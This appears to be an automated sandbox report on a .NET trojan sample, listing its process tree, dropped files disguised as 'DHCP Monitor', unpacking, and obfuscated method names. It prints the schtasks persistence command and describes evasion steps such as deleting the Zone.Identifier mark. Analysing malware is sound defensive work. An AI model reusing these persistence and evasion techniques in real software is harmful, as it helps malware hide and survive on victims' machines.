Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp'
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe 0
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: unknown	Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmpAD7D.tmp'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Process created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\LFEs2N6DU4.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

File created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@18/12@26/3

Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6008:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\{9845a945-f2ff-4e93-b909-aece664ddb48}

Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

File created: C:\Program Files (x86)\DHCP Monitor

Jump to behavior

Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: LFEs2N6DU4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LFEs2N6DU4.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: LFEs2N6DU4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: mscorlib.pdb source: LFEs2N6DU4.exe, 0000000D.00000002.530361006.000000000101E000.00000004.00000020.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2440 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A4AFF push 00000002h; ret	21_2_026A4B40
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A4B47 push 00000002h; iretd	21_2_026A4B4C
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2B5B push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A3B0C push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A4B1F push 00000002h; ret	21_2_026A4B40
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A4621 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A4639 push 00000002h; retf	21_2_026A4698
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A26E9 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A26D6 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2440 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A26BA push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2767 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A277F push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2722 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A273A push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A2703 push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 21_2_026A3D8B push 00000002h; ret	21_2_026A4638
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_0294E00C push ecx; ret	22_2_0294E014
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_0294AF90 push ecx; ret	22_2_0294AFA4
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_0294DFEA push ecx; ret	22_2_0294DFF4
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 22_2_0294E4CB push esp; ret	22_2_0294E4D4

Source: LFEs2N6DU4.exe

Static PE information: 0xE6EFFE28 [Fri Oct 10 14:37:28 2092 UTC]

Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 24.2.LFEs2N6DU4.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	File created: C:\Users\user\AppData\Local\Temp\dhcpmon.exe	Jump to dropped file
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	File created: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmpA85B.tmp'

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe

File opened: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\LFEs2N6DU4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
